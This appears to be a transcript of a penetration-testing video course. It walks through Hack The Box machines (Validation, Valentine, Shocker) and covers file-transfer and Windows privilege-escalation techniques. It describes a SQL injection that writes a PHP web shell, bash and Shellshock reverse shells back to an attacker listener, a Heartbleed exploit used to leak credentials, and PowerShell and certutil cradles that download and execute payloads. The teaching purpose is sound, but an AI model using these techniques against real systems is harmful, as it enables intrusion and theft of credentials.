try and SSH to the default username, which was Pi at 10.10.10.48. We want to fingerprint the box, and then we'll type in the default password, and we are on the box. All right, now that you are on the box, one of the first things we should always check is for sudo -l. This will tell us what privileges we have or what files we can run as sudo or as root, and it says that we can run all of them. So you can actually just go sudo su, and you can switch straight to the root user. It's a very simple privilege escalation. It's not super common, but you will see it in the future, especially in CTFs. And with that, we'll see you in the next video. Okay, we are going to be going through the box validation. This is kind of a challenging box, but I decided to put it on early in the course because we had gone through SQL injection previously, and we have talked about and seen a little bit of blind SQL injection, and this box is all about blind SQL injection. So if you want, you can go ahead and try and give it a shot without going through this walkthrough. And one thing I also want to add is when you're new and we're going through these walkthroughs and you're like, man, I never would have thought of that. I never would have thought of that. I never would have saw that. Just know I had those exact same thoughts. I had all those exact same feelings. And I probably went through 50 to 60 walkthroughs. I would read them, I would go and do the box, and then I would wait 5 or 6 days, and I would try and go and do it again without any walkthrough and without any help. And so I encourage you to do those same types of things. It will be really helpful and beneficial for you to actually go through a walkthrough and then go and do the box again later on your own without the walkthrough and without any help. Because it kind of helps you start thinking about these things. Like the things I'm about to show you, like, are things I would have never known had I not seen something like it before or seen the exact same thing previously in a different box or a different CTF. So it is one of those things where just watching and going through with these walkthroughs, I have to tell you, take notes, take notes, take notes. Every script that you see, put it in your notes somewhere that you can find it, because a lot of the enumeration scripts I have are saved, and I will copy, paste, and change the IP. I have a methodology written out, and you're going to have to write out your own methodology on how you go through and enumerate, and all of this comes with time. I would say within 6 months to a year, you'll have a good methodology. You'll know kind of what you're looking at and where to go. So with that, don't feel too overwhelmed as we continue to go through these. So we're going to go ahead, run InMap. I've already ran it. It actually went pretty quick. And we have port 22. I've told you I don't usually look at that. Port 80 is often first place I go. This site is forbidden, and you have Nginx. You don't even have a version. You might be able to try and enumerate this with burp, the version, but it's probably going to be not useful. We have 8080 open, says bad gateway, and then a lot of this I wouldn't mess with unless I hit any dead ends. So we'll go ahead and we'll check out this port 80. So we'll just come up here. 1010, this is not a 1010.116, and it says join the UHC September qualifiers. So one of the first things to do is just to see what happens with this. So you enter a name, it says the player's name in Brazil, and then it lists it. So if we go back, do the same thing, we get another name. So the next thing to do is to come into burp and turn on your interceptor. Go ahead and actually what we'll have to do is turn this off. We'll go back and we'll go ahead and put in name 2. Now we'll turn on our interceptor, hit join now, send this over to repeater right here. We'll go ahead and turn that off, come over here, send it, see what our response looks like. One of the things to look at is the Apache version. I'm pretty sure there's not going to be anything there. We can look and see what is in this post request. And one of the things I think we've covered earlier in this class is just coming through and throwing in these just like this and see if anything happens. And nothing, we're not getting an internal server error. So our first thought is, well, maybe there's not a SQL injection, but there actually is. And I ran SQL map against this, and it didn't find anything. So this is one of those things that you're going to have to do manually. So we have this cookie here, and every time we send this, we get the same cookie. But if you are messing with your inputs and you change this and you send it, we get a different cookie. And really it just says user and then this. So the username is what we change over here, is determining what our cookie is. So every time we do something like this, we're going to have to change the cookie. Now this part of this box took me really quite a while to figure out, more time than I care to admit. So you come over here, you send it, we have this cookie, you can copy it and you can inspect the page. We'll make this a little taller. And we go over to storage or memory storage. And here's where we can change our cookie and we can enter this, we can refresh it, and we have an error. So this is where we see the error from the SQL injection from our little quote that we put right here. So here's the error message, and take note of where this is at. This is var www html, and then we have the web page right here, the account.php, which is right here. We're going to need to know that for later on. So now if you remember how to do SQL injections, the next thing we need to do is union select one -- and we'll have to change this username. So we're going to check for columns to see how many columns are in this table. And the sad thing is we have to do it manually. Enter, refresh, and we have an error right there. We're going to have to come over here, select 1, name 6. So we got to change it again, so that way we get a different cookie. Come over here, paste it in. For some reason, I think that was the same. Did that send? We'll go ahead and do 7 because I'm not really sure. Now I know for sure that's a different cookie. Come over here, paste it in, enter, refresh. And we do not have an error, which means that it went through, which means what we sent through was true. Our statement of union select 1 column is true. You can try for a second. Change the name, 8, send, copy. You can actually just press Command C and copy that. Enter, refresh, and we get an error because there are not 2 columns. We have hit a false statement. So the next thing we can do is we can try and put our own file in here. I actually just thought of a new way that I haven't tried to do this, but we're going to go with the way that I know works. So we're going to put a web shell in here, and web shells are something we haven't seen. So we can just come in here and type in web shell and see what happens. We'll just type in web shell. We might have to type in web shell, PHP web shell. And this is kind of one of my go-tos. So we'll click on this and we have some web shells. So what we're going to do is we're going to use this. Where is it? We're going to use this SQL injection to put our own really small web shell, or this short little code right here, onto the server, and then we're going to call this, and we'll have a basically command injection through this web shell. So we'll have access. So what we're going to do is come back to burp, and we're going to delete this. And so we're going to actually need our union select statement here and type this out. So we're going to I'm going to paste it rather than type it. So we'll come here, we will copy the web shell that we need. And you're going to see how these web shells work. And web shells are something that you're going to see a lot. I don't use them that often unless I absolutely have to. I usually would rather just put a file and then execute the file somehow rather than do a web shell. A lot of people will do web shells just to see if they can somehow execute code on the server through a web shell, and then they'll put a file. I usually go straight for the kill rather than waste time doing a web shell. I know people out there would say, well, how do you know you don't have an error with your file you're putting? And a web shell is the best way to go. But I don't usually do web shells unless I have to. And trust me, you're going to need to bookmark this page as web shells, and you're going to want to come back here because it's something that you're going to come across again. So you're going to come in here, paste the web shell, so that way we don't have no typos. Then in order to put this onto the server, we have to type into out file. And then if you remember the error that we had right here, this is where we're going to put the file. So that way when we go here to the extension, we have access to our web shell. So you can go ahead. Actually, I'm just going to hit Command P or Command V to paste that. And then we're going to name it. We can just name it shell.php. I usually name them shell, shelly, or something like that. We got to close our quote, dash, dash, dash. Now let me look at this. It looks okay. We're going to go ahead and change our name to name 9. Has this got 2 spaces? Nope. We're going to send it, and we will see what happens. So we'll come in here. Okay, I ended up having to revert the box. I'm not really sure what happened because this is the same PHP script that we ended with when I took that second to try and debug what was happening. I ended up having to revert the box and it ended up working. So once you end up sending this through, it'll put this PHP script into this location, into this file, and this location on the server. So what you end up doing is coming up here, you type in shell.php, and then the cmd equals ID, and that will tell us, like we can do it, who am I? And it says we are www data. So now that we have this web shell up and working, we can go ahead and try and get a reverse shell on our Kali box here. So we have this, we can type which Python. I usually try Python shells first and nothing comes back. So what we'll do is come over to Google, type in one line reverse shell, and we'll see Pentest Monkey is usually a good one to go to. You can try bash. The first time I did this, I tried bash over and over and over again, and I could never get it to work. Then I went to PHP and I couldn't get it to work, and I reverted the box then too, and then I ended up getting the bash to work. So what we'll do is we'll just kind of play this and see how it ends up going. You can paste in your reverse shell just like this, and then we need to actually right here type in bash -c, which means we are going to execute the code that comes afterward. And then we'll just use port 4444, and then our IP minus 10 10 14 15, and that looks good. So we'll come over here, we'll open up a netcat dash lvnp 4444 and cross our fingers, hope it works. And it does not come through. So what we can do is we can intercept this. Go ahead, intercept it. We can send to repeater, so that way we have somewhere to put it. And we'll go ahead and paste this in. Control U is how I URL encode, in case I forgot to mention that. And it's hanging. And we got a shell. See, I'm not real sure why it decided to work there, and it wasn't working in other places. Now, I wasn't planning on doing any privilege escalation, but because it's right here, if you type in ls, anytime you see config.php, look in it, because I would say 90% of the time, maybe more, if you ever find on a Linux machine config.php, you are going to find a username and a password. So one of the things I actually will do when I am on a Linux box is look for config.php, and the fact that it is just sitting here as soon as we come into the box, you can just type in cat config.php and you have a username and a password. So I actually tried this previously. See, if you look at our ID, we do not have root privileges. I tried to switch users to UHC and then use that password, and it didn't work. But if you just type in switch users and then paste in the password, and then you ls, we're in, and you type in ID, and you are root. So that's a really easy win on this box. If you ever see config PHP, just remember to go ahead and look in it, because a lot of times there are going to be passwords in there. Also, on this box, if you get stuck like I did here, and also right here, I would just say revert the box. I had to revert this box at least 5 or 6 times, and I'm not really sure why. When I originally had done this machine, and just even here, I had to revert it in order to get it to work, and it's kind of finicky also when you're trying to get this reverse shell. I'm not real sure why it worked here, why it didn't work here, because when you press enter here, usually the URL will automatically URL encode on its own, so you can have spaces and weird characters and it'll take care of it itself. But for some reason, it had to be done here. Also, some people like to switch it to a post request. I could not get it to run from here, and I had to leave it just like this in a get request the first time I did this box. I spent, I bet, 30 minutes messing with this as a post request, and I could not get it to run. So sometimes persistence and a little bit of luck, and you can get into these boxes. So this is a web shell. You're going to see these again. Be prepared for them. You're going to see them in certifications. You're going to see them job interviews. You're going to see them in CTFs. You're probably, just need to get used to seeing these and be thinking web shell whenever you are able to put a file. You can think web shell for me is always second, but it's always there if I need it. So with that, we'll continue, and we'll see you in the next video. Okay, we have gone ahead and launched Hack the Box. We're going to start Valentine, so you can go ahead and connect your VPN, and then you can go ahead and launch the box Valentine. And when you're ready, you can come over here, type in ping 10.10.10.79, make sure you're connected, and go ahead and close out of that. And then we can go ahead and get started with our Nmap scan. That's usually where we start off. So you can go ahead and type in Nmap, and we're going to not run that script. We're going to go PHP for all ports, and then -a, and then I like to run it with a -v so I can see the output as it runs like this. And it's going to go ahead and run, and I believe these are all the ports that come up. I've already ran this, so we can go ahead and give this a look. And we have port 22, port 80, and port 443. This is actually the vuln scan that I ran, so we'll go ahead and I'll show you what that looks like. So we'll go ahead and run it like this. We'll go nmap dash, and it should pop up, dash script. It did not pop up. Vuln 10.10.10.79. And when you run that, it takes a little bit to run. And so I'll go ahead and let it run, and we'll see if it pops up by the time we are ready to look over it. So we have port 80 and we have port 443. So what we can do is come up here and just go ahead and look at the web page. We'll go ahead and look at the source to see if there's anything in there. There is not. You guys are pretty familiar at this point with how to look at web pages. So we'll go HTTPS and see if there's anything different. Go ahead and advance, accept the risk, and continue. And it's the same, and you can go ahead and do like your basic robots.txt. One of the things I like to do is go index.php, and that will tell me if there's if I need to run my GoBuster with a .php extension. A couple of things I like to do when I run my scans is I like to run a GoBuster, and that looks okay. We'll go ahead and just use this one that's up, and we'll run a 10.10.10.79. And when you run a GoBuster, because it had that index.php, we'll need to run the extension PHP and see what it pulls up. And then I also like to run fuff because it runs way faster. And we can go ahead and run 10.10.10.79. And when we go to the word list, just in case you haven't run this before and you don't have it saved, the way to get there, the word list I like to use, I believe it is in user share word list derb, and we'll go ahead and run that. And then you can run common.txt or big, and then the other one that's popular is Durbuster, and then the medium, so this one right here. This is how you get your word list, and yours will probably be in the same place. Why does that say we have a problem? Oh, we forgot to put our place to fuzz. So we'll go ahead and fuzz right there. And you can see just how quick this is running. So we have dev, index. Let's see if let me close that one. PHP one is found the same, dev, index, index.php. So we'll check back on this later, but for now the nmap quit running, and since we ran our vuln scan along with our nmap, we can go ahead and look and see what it has come back with. So one of the things in your methodology is to, when you run an nmap scan, if I ever see port 53, 135, 139, 145, I run this scan right here. We'll see this later in the course, but it's not up. None of these ports are open, so I didn't run it. I like to run this. Sometimes you will come back with vulnerabilities. Not too often are you going to see it on like a difficult capture the flag or even a job interview box, but you might. I have actually seen this. It took about 5 minutes, and I was able to get code execution on a box for a certification through just running this. It didn't take long at all. And so sometimes it's helpful to run. And there's the vuln scans with nmap, but if you're running it on a difficult box, it's not going to pull anything back. You can also run Nikto, which we'll cover later as well. Sometimes it comes back with stuff and sometimes it doesn't. Anyway, onward, we see that it's vulnerable here to this, and then Heartbleed is vulnerable, and SSL Poodle. So when you see Heartbleed, and given that we are looking at this bleeding heart, that's where we're going to go ahead and attack. So with Heartbleed, the way it works, and I actually think there's a guy who explains it on this website here, and we'll see if if it's still up. Yes, so this is how Heartbleed works. So when you send a request to the server, you'll send the request like this. You want to see how many letters does potato have. It'll give you the response, and you can go how many is in bird, gives you the response. But the way it works is if you say, I want the word hat with 500 letters, it will send you the word hat with everything after it. This is where you're going to try and exploit Heartbleed, is you're going to try and find some kind of credentials or sensitive information. So we're going to send a request to the server saying we want something 3 to 5 letters, whatever it may be, in the exploit, and then ask it to return everything for 500 letters or 1,000 characters afterward, and it's going to send us back that information and see what we can find. We'll go ahead and you can go to Heartbleed and then GitHub, and there is a GitHub page that should have this, yeah, right here. So one of the things when I go to GitHub, I think I've mentioned this before and I will probably mention it again. When I go to a GitHub page, one of the first things I look at is how many stars, how many forks, and then I like to read the comments because I want to see quickly, is there anything, is this exploit going to do anything fishy on my virtual machine? And I've already ran this and it doesn't. One of the other things, if you are a programmer, you can go through and read the code and make sure it's not going to do anything fishy. I've already looked it over. Like I said, I've already ran it. So I know this is the one we need. And you can actually copy this to your virtual machine a couple different ways. You can come up here and you can go to the raw and you can highlight it all. You can copy it. You can make your own file. This is how I usually go about it. And then
we'll call it heart.py. I paste it in here, I save it, and I'm done. And that's how I go about it. You can also come up here. I think you can copy link location and run a wget on this. And then it will also grab right here, the exact same thing. So a couple different ways you can get it. Usually, sometimes exploits will have like super long names that I don't want to retype, and so I just go to raw, I copy it, and I'll just name it like exploit.py, in this case heart.py, and save it. And now the way we go about running this, we'll go ahead and actually open it back up. Gedit heart.py. And so actually at the end of the exploit code is where it's going to run. I thought it was at the end. It's right here. So right here's where we're going to make the request, and it's going to send, this is the length we need, and then this is the payload length. And I think this hex right here is 4,000 characters. Just run it this way. There we go. Now we have our, it's a dash help. We can go ahead and look, and it'll tell us how far the hex dump is going to go. And there's what it's going to look like. So it is 4,000 characters. So it's that far. All the way back to the top. Okay, so when we run this, we're going to go ahead and run it as Python -n100, and if you remember from up here, it actually tells us if we want to run this a number of times in a loop instead of writing our own for loop to run this over and over. And then we can go ahead and run it, and it's going to run, and then it will give us our output. And while that runs, we can see here's what FUF has brought back, and you can see how much faster it is than GoBuster. And GoBuster has brought back these. This one is one that looks interesting. So does decode dev would always be super interesting to go look at, but it actually has a, looks like the page is forwarding to another page. So we can come back here and look to see what we have. Okay, that did not bring back anything interesting. Let's go ahead and check dev. We have notes, and there's nothing interesting there. And then we can go to hype key, and this looks like it is encrypted with hex. And if you look at these, I think that is a line break for ASCII. So if I come across this and I didn't know what it was, a lot of penetration testing is literally trial and error and reading a ton on GitHub. And so it's just the nature of the beast. You're just going to have to read, and you're just going to have to experiment. I've actually already done this box, and so I know what we're going to do here. But you'll get used to seeing like what is this and why am I seeing that at the beginning, and you'll just know this is going to be hex to ASCII. And then you can just go ahead and run those. So you can actually come up here and go hex to ASCII. A lot of times I'll use a burp decoder. The problem is it doesn't have that option. So you can paste this in here and you can run convert, and this looks like an SSH key. So go ahead and copy it. And this is finished running. We'll go ahead and save this as gedit. What did it have it saved as? Hype key. So we'll go hype.key. We'll go ahead and paste that in. And before we forget, we'll need to change the mode on it. So hype key, so that way we can run it when we try to SSH. So if we were SSHing here, we'd go SSH hype at, and then the IP address 79. I forgot to add the -I, which means we're going to use a key, and we're going to use hype key. And if this is the first time you've ran this, you're probably going to get asked, do you want to fingerprint the box? And you will say yes. And it's loading. And it's asking for a passphrase, which we don't have. And so if you hit enter, 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 it doesn't work. But when we ran our Heartbleed and we got all this information here, this is a double equals. And typically when something ends with a double equals, it's base 64, which I actually think I have this pasted in over here. Yeah. So we have this base 64. You can come over here, go decode base 64. It might be on hex. You can go ahead and click onto text, and then your code you need to remember is Heartbleed. One of the things I always do is I have a notes. I'll go like this, and I'll copy this, and I will paste it, and then I have the encoded and then the actual password. Save it. So that way I have it for future references, and we're not going to do privilege escalation on this box right away. We're actually going to do that later in the course, so you're going to want to go ahead and save those. Now we'll go ahead and try to SSH again, and then we're going to feed it in this password whenever it finishes loading. And it says we're in. So we are on the box. And here we are. We're going to come back here for privilege escalation later. And we went through this really quickly, and I get that. But I think it's helpful just to see, as we walk through a few of these boxes, just to see how they're done and what you're looking for. You're going to get used to enumeration. You're going to get used to looking for different things. But right now, being new, it's going to take a little while. It's going to be a little bit of a struggle, but the thing about this field is you just have to keep going. You just have to keep going, and things will eventually, in a few months, you're going to know what to do. You're going to know what you're looking for. You're going to know what you're looking at. So this first box, we're going to come back to it and do this privilege escalation later, and we went through that really fast. And a couple of other things that I would just do in the enumeration that we actually skipped now that we've gone ahead and finished it. We'll go ahead and look for our, let's exit this. We'll look at the Nmap scan. One of the things I would have done is I would have come in here and I would have looked for like this right here, Apache 2.2.2. Copy this, go look at exploit DB, go out and look and see if there's anything on GitHub, and I would have looked for these versions, because one of the things you're going to find when you are going through the certification process is almost everything you're going to come across is going to have some kind of version. You're going to look at it and you're going to have to cobble together a bunch of different stuff from GitHub pages, exploit DB, random medium web pages. Like, you're going to just have to cobble together code. Very rarely are you ever going to go, oh, here's an exploit for this, and you're going to go to search exploit and you're just going to search for a specific vulnerability and it's going to work. You're almost always going to have to change the exploit somehow. And so it's one of those things to be looking out for as you're going to be going through here. And hopefully as we go through here, you're going to see some of this, and I'll try and give you guys some more tips on what to do and what to be looking for, not just simply walking you straight through the box like I did on this one. I wanted to make this one rather quick so you can kind of see how we're going to go through these, and they might get longer the more we go through this course so that you can see exactly the methodology. I'll take us down some rabbit trails that lead to nowhere, but it's helpful for you to be able to see, okay, here's the enumeration process. At what point do I give up and say, okay, this is a rabbit hole, there's nothing here, and move on. So with that, if you have any questions, let me know, and maybe I'll
append this video or remake it and try and answer the questions or anything that wasn't clear. I'll see you in the next video. Okay, we are back. We're going to do the box Shocker from Hack the Box. You have everything you need to go ahead and attempt this box. I actually think you guys can complete this box on your own. I want to challenge every single one of you to go ahead and try and get the initial foothold on this box without watching the video. You guys have learned everything necessary or have seen everything necessary to complete this box. I want to go ahead and have you pause this video and give this a go. And if you're not up for that, we'll go ahead and start the box now. So one thing right off the bat that I want to point you guys to is this port 2222. It says it's open SSH. So normally we see SSH on port 22, but in this case, the developer or whoever set this up has decided to put it on port 2222. And you will see this from time to time. You'll see web servers on random ports. You'll see FTP. The port that's usually 21 will be on a different port, and in this case port 2222 is the SSH port. So this box has SSH on it, it's just in a different location. So with that, we know SSH, probably nothing there. We'll only come to SSH if we really are stuck. This is looks to me, if I'm remembering right, it's a non-vulnerable version, so especially if we know that it's been patched. So we'll go ahead and check out port 80. So we'll go ahead and open up a new window, 10, 10, 10, and I think this one's 56. And it says don't bug me. We'll go and where do we view page source? And we see this JPEG, and that's it. So we can go robots.txt, or we can just come over here and we can open up a new derb and just go 56. I know I said I usually like to use GoBuster, and I really do, because I can come up here and I can go like this, and I can go /index.php, and if this works, then I know I need to use this extension PHP, and GoBuster, it's really easy to do that, but in this case we don't need to, and derb just has a default word list, and you can just type it in just like this, hit enter, and let this run. And while that's running, one thing that we can always do is go robots.txt, and we can see if there's anything here, and there isn't. So we'll go back to our derb scan, and we'll let this run for a little while, and I'll bring you back once we have some results. Actually, while this is running, what I think we'll do is we'll just go ahead and look at this version. So we'll go ahead and copy this. We can open a new page, paste it in, and hit enter. One of the things I like to do is type in exploit and then read about the exploits that are here. So we have an exploit DB, and we have a rapid 7, which is usually a good one if you can use Metasploit. Rapid 7 is a good one. And then we can go ahead and click on these, and we can read about the different vulnerabilities that have popped up for this version. These are pretty much useless for our case, but if you were doing we'll go ahead and check out. We'll go ahead and go back to our scan that we were waiting for, and we have one result come back, and it's the CGI bin. And you guys have heard me talk about this before, and you should remember, when you see CGI bin, especially on an older box, what should we automatically think? We should think shell shock. So we'll come back up here and we can paste this in, and it says we have a forbidden page, and that is okay, because what we can do is we can come over to burp, we can turn our intercept on, and I'm going to show you something that's pretty cool. This doesn't happen too often, but it does happen. What you can do when you know this goes to a forbidden page is I sent that over to Repeater because we're going to need to work on this page here in a second. But one thing that you can do when you hit a forbidden page is you can always come in here and you can do intercept the response, hit forward, and then it says we have this forbidden. Sometimes you can type in a 200 okay and send it, and it'll bring up the page anyway. But in this case, it doesn't, it still brings back forbidden. So we'll come back over here to repeater, and we have our CGI bin. And you should remember that this is vulnerable to shell shock. And we also have learned about the shell shock, or we know from this, the name of this box, that it is called shocker. So that is also something that is helpful to be aware of. Okay, and so we know that this is got the CGI bin. We're going to go ahead and test it for shell shock. And if you remember, what you can do is you can just go to the user agent. I think this is probably the most common place that people use this. I store this in my notes. This is my IP address for it to come back to. This is the port we'll go ahead and listen. We want a bash shell. And so what we'll do is we can come over here. We can go netcat -lvnp 4444 and have that listen. And then we can hit send. And it says we hit a forbidden page or a machine running here. And one way to get files that I forgot to mention earlier, so this is a new video, is the URL cache with the certutil. So I've actually gone ahead and made a test file, and I'm hosting it up with the Python server in this directory so that we can go ahead and grab that. And the way this syntax works is certutil -split -f -url cache. So this dash split, being totally transparent, I'm not really sure why, but sometimes it will not run without this. And this is a -f for, I'm assuming that's file. And then the URL cache, it's going to go out to the URL we get it, and it's going to save the file that we feed to it. So we go http://10101415/test.txt. And so this should run out to our server that we have, and I think it's actually going to take a second, and it will grab the file. It says, I didn't spell it right. I forgot the dot, or I messed it up. So we'll go ahead and highlight this so I don't have to retype it, and go .txt, and now it should run. It'll come out here. We should get a 200, and then the machine should have the file here, so we can go dir, and we have the test.txt. And if we type it, we type test.txt, it says this is a test. And if you come back to our file over here and we cat test.txt, it has the same information. So it successfully grabbed the file. This is one that is going to be really useful. We're going to use this quite often. I use this whenever I cannot get PowerShell to grab a file or execute a file that I'm just using the PowerShell-C with the download string, because sometimes that doesn't work, and sometimes I actually need to get the exploit onto the machine, and this is how I do it. And I'll see you in the next lesson. Okay, we're going to go ahead and cover evil WinRM. And so this is downloaded through the Kali repository, so you can go sudo apt install evil WinRM. And if this doesn't work, or it says that it's you get an error, you can go ahead and go sudo apt upgrade and then rerun sudo apt install evil WinRM, and it should go ahead and install for you. It'll ask, do you want to install? You'll type in yes, and this can take a while to download depending on your internet speed. So we'll go ahead and run that, and the syntax to run evil WinRM is right here. So it'll be evil WinRM, the user, and your username. The P stands for password, and this will change to the password of whatever you have, and then the IP address that you're attacking. So if you ever find a username and credentials, this is a good way to go. And evil WinRM uses port 5985 and 5986. So if you ever see those ports open, you can thank evil WinRM, and it is one that I really like to use. So if I see those ports and I get credentials, this is where I go. And so when it opens, we'll actually go ahead and go to a place where we can write to. We'll go to the desktop, and if we go ahead and ls or dir, because we're able to use ls on here, we can go ahead and press ls or type in ls or dir, either way, and here's your user text. But watch how easy this is to upload a file. So we're in this desktop windows, and over here we have these files, these text files. We can go ahead and type in upload, and then we'll type in test.txt, and it will upload for us this file. And watch how easy this is. See how simple that is to upload a file? If this was something that we needed to get privilege escalation on, we can upload a file simply. We can upload WinPs, or we can upload some other form of enumeration, some other tool for enumeration, and it just goes really simple. It's really easy to move files about. And then also, if we are running like Bloodhound or something where we need to get files off of the Windows machine onto our Kali machine, it is also really simple. You can just type in download, and then you can type in the file over here, and it will go ahead and download that file for us, and it'll go straight into our Kali folder over here. And it is really my go-to if I have the option to use Evil WinRM, and so I would highly suggest downloading it and looking to use it. And we're actually going to use it in future boxes, so we're going to get to see exactly how to use this when it comes to some of our Active Directory boxes, because I like using Evil WinRM when I have to get files off of a Windows machine. And so with that, we will continue on in the next video. Okay, we're going to be going over a few ways to transfer files over to our Windows machine. And one way to go about this is to just go ahead and execute a file with PowerShell. So what we would do is we would come over here to our place where the file is located. We'll host it up with a simple server, and then we would put in PowerShell -c IEX and then the rest of this, and what happens is this will actually execute the file rather than download it over here to the server. So this will only be one that we use when we have a malicious exploit and payload that we really want to run, and we don't necessarily need to move it. And we will see this over and over and over. I would recommend just putting this right here on a flashcard and memorizing it, because it'll be really helpful in the future. So this is one that we're going to see again later. So what happens is it uses PowerShell to go ahead and execute this command, and it will grab this file, and then it will actually just go ahead and execute it. So this is one that's going to be really common for us to use on web servers. So if we need to just execute something and we have a netcat listener, say we have it over here, where we would be hosting up the file here, and if we executed it, say in this web browser, this command right here, like this, what would happen is ASPX, I messed that up. What would happen is it would come over here, the server would run PowerShell, and then it would run this command. It'll go to our listening over here where we're hosting up the file. It'll come over where we're hosting this up, and then it will grab the file, and then it will execute it. And then on our netcat listener, if we had one running over here, like this, it would give us a reverse shell over here. So it may seem confusing at this point, but what you need to know is that you need to memorize that, and you're actually going to see this later on. I just wanted to show it now so that way you're not caught off guard, like, hey, what is this? I haven't seen it before. So what we do is we would run it, and I don't know if it'll actually reach out. No, it's not going to. That is the command. We're going to go and see another one that this command should run on, and so we'll run it on the next box, but there's going to be a little more to the next one because we're going to be using Evil WinRM, which has a very simple way to transfer files. So I'll see you in the next lesson. Okay, the next version of file sharing we're going to use is going to be from npacket, and it is going to use the SMB server. And so what you'll need to do is type in sudo apt install python 3 npacket, and this is something you need to install. You're going to use it a lot. There's a lot of npacket tools that we're going to use. There are a lot of penetration testers that would say if there's anything that they want to take with them, if there's only one group of tools they can have, it would be these npacket tools. We're going to use them in Active Directory. We're going to use them in just basic enumeration. These are really useful. You're going to want to download these, and we're going to use it now for a file transfer. This is kind of my last resort for file transferring because I don't actually, it's not actually that easy. So what we have to do is we have to start a server. And so what we'll do is go in and type in npacket SMB server. You'll make up a username. I made my username D and the password D. We're going to share all. And so you can go ahead and type this out and pause the video. Once you're done with that, you will hit enter. And now we are sharing all of the files within this directory here. So we'll come back over here, and in order to get access to this, we're going to type in netuse // and then our IP address 1415, and then we're going to type in the share name, and then we're going to type in / and then our user, and then the password that we're using. We'll go ahead and hit enter. It says the command was completed and successful. So now in order to get to those files, we're going to cd // actually, you know what, I'm just going to copy this because I don't really want to type it again. We're going to cd to that location. And now we are here. Now we have access to those files. And if, let's say we had an exe file or some kind of payload that we want to run, maybe winpeas.exe, what you would do is you would just type in / and then file.exe here, and then it'll go ahead and run it. So for example, we're going to give it the command type test.txt, and it should go out to our server and return what's in there. So we can actually go, like, I have 3 test files to show you that there's 3 different things here within this file. So we'll go ahead and shut this down, and I'll show you. See, we have test.txt, test2, and so we can actually just cat test2, and you can see what's inside the file and that it has access to it. This is my least favorite way to share files, but it is an option that you need to be aware of because I have had to resort to this in the past. So with that, we are going to continue on. Okay, we are going to be starting the Windows privilege escalation portion of this course. I want to go over a couple of helpful websites, good resources that you should have. I would save them, I'd bookmark them. I have them bookmarked. And I'll tell you, my favorite is this one right here. It is the Shusant 747 guide, and so you can come to Windows or basic Windows, and you can come through here, and it's going to give you commands. These guys are my go-to, but there's a couple of others that we can use. So this is a good one, and you can actually see, you can go PowerShell, and you can look at other versions of or other ways to search for information or possible exploits. You can come over to Hack Tricks. These guys are another really good resource. I shouldn't say this is the one I go to the most because I do come here a lot also. These guys are really helpful. They're helpful when you're doing a Linux box as well. And so we'll get into some of these commands and what they do and how we use them. And we're going to find that these guys can be really useful, really helpful whenever we're going through privilege escalation. And some of the stuff we're going to do is going to be me literally, I'll tell you when I'm doing this, but it's going to be me coming over here, copying and pasting, and you're going to get to see privilege escalation side of things. There are tools that do a lot of what we see here. We'll actually run through this, and all we have to do is go through and read the output that the tool runs, but sometimes that is not going to work. Sometimes we'll try to run WinPeas and it will not work. and I've spent a lot of time wasted trying to get tools to run when I could have just manually run through some of the scripts here and saved a lot of time. So it's helpful to know to come here and to be able to see these. So this is the second one. You don't have to worry about trying to type this out. I'll have it linked in the course resources. And then we also have payloads, all the things. This is a really good website as well because they have Windows privilege escalation. We've used these guys before. They have a lot of helpful scripts beyond just Windows escalation, privilege escalation. So this is another one, and they'll tell you user enumeration. This is a great one to go to. Just copy, paste, and it will tell you who you are and the privileges you have. And one of the famous ones for having run this is, I think it's SE privilege token impersonation. Now I can't remember. This is one you run, tells you, this will tell you what groups you're a part of, this will tell you what privileges you have, and this will tell you the users. And so there's a lot of helpful scripts in here. You can literally just go through and copy paste these straight in and do enumeration. So these guys really helpful, and one that I would also recommend. This is another one. I will admit that this is one that I do not really use. So I would recommend you looking over it and seeing if you would like to use it. See, they actually give the example of the output rather than just the command. And so you can use these guys if you want. It's pretty much all the same command. They only have screenshots of the output as well. So with that, we'll go ahead and continue on in this course. I'll see you in the next video. Things to be aware of. I already mentioned the IP config, so we'll go ahead and go IP config. Another one to check is the route print. This will tell us our route. It will also tell us up here if there's any other boxes connected to this one that maybe we're in an Active Directory environment, or there's another machine inside of the network that is not connected to the outside network, but it is connected to this one, which is connected to the outside network that we have access to. We can set up proxy chains, or we can try and figure out how we can connect that other box that is within the internal network and see if we can get some information from. So it might sound a little daunting right now. It's really not as difficult as it sounds, but the route print is one to look out and see if there's anything in here that looks interesting, or any other machines talking to this one that we don't have access to. So the route print and the IP config, it's the IP config /all is also a helpful one to run and to look at and see if there's anything interesting in here. We also have arp-a is one to run. Just gives us more information here about what this box is communicating to and how it is set up. And then one that's also really helpful is netstat-ano. And this will be helpful because it'll tell us what ports are listening and which ones are open, so we can go ahead and we can see these. And maybe there are some of these ports that we weren't able to access through our nmap scan, and we'll want to see, okay, let's say this port, we weren't able to access it. Well, what is it doing? Why is it listening? Is the box connected to a port out there that we weren't able to access? And if it has a port open and established, one of our goals is to try and figure out why and to set up a port forward and see if we can gain access to that port and see if we can enumerate it. This is going to be something that you're going to face in CTFs. It's something you're going to face in certification exams, is you're going to have to learn how to port forward, and you're going to need to get used to running this netstat-ano to see what is out there, especially in Active Directory situations. Looking for other IP addresses that's connected to this box is going to be essential, and then also looking for ports that are connected is going to be essential for us to be able to continue on in our journey. So these commands are ones you should memorize, you should know, you should just run them right away as soon as you get on a box, on a Windows box especially. They're not going to work on Linux, but as soon as you get on a Windows box, you should be running these or thinking, okay, what am I connected to? Who am I? What users are on this box? and is there anything connected on here, and then how do I become one of those high-level users. So with that, we will continue enumerating in the next video. All right, so you've already seen the system info, the who am I's, kind of went through this group here, but one thing we didn't talk about was the firewall. When you come onto a box, you can look to see what firewall you're up against, or if there's several, if it's maybe Windows Defender, if Windows Defender is disabled, or some other kind of firewall. I don't know why. I think Windows Defender is probably the best out there, but sometimes people will disable them and they'll enable other firewalls. And if you find the firewall that you're up against, you can go ahead and copy it and see if you can find what version it is, and go out to Google and see if maybe there are some exploits against those firewalls. So being aware of the firewall is always helpful. But that is not what this video is about. This one is about the password search. So this is something that does happen. It happens regularly in CTFs. It happens in certification exams. You are going to come up against a stored credential, and you will be able to just copy this, paste it right in, and hit enter. Here, nothing comes back, but these are really helpful to run. I have found some others when I was searching for passwords or stored credentials in Google beyond just these. So be aware of that. If you run these and nothing's working, maybe you could go out to Google and type in finding stored credentials on a Windows machine and see if you can find some other one lines that you can go ahead and paste in and see if you can come back with any stored credentials. One other thing to be aware of is that you don't just leave this as password. When you run it, you need to change it to passwd, run it with password. Sometimes you can run key. 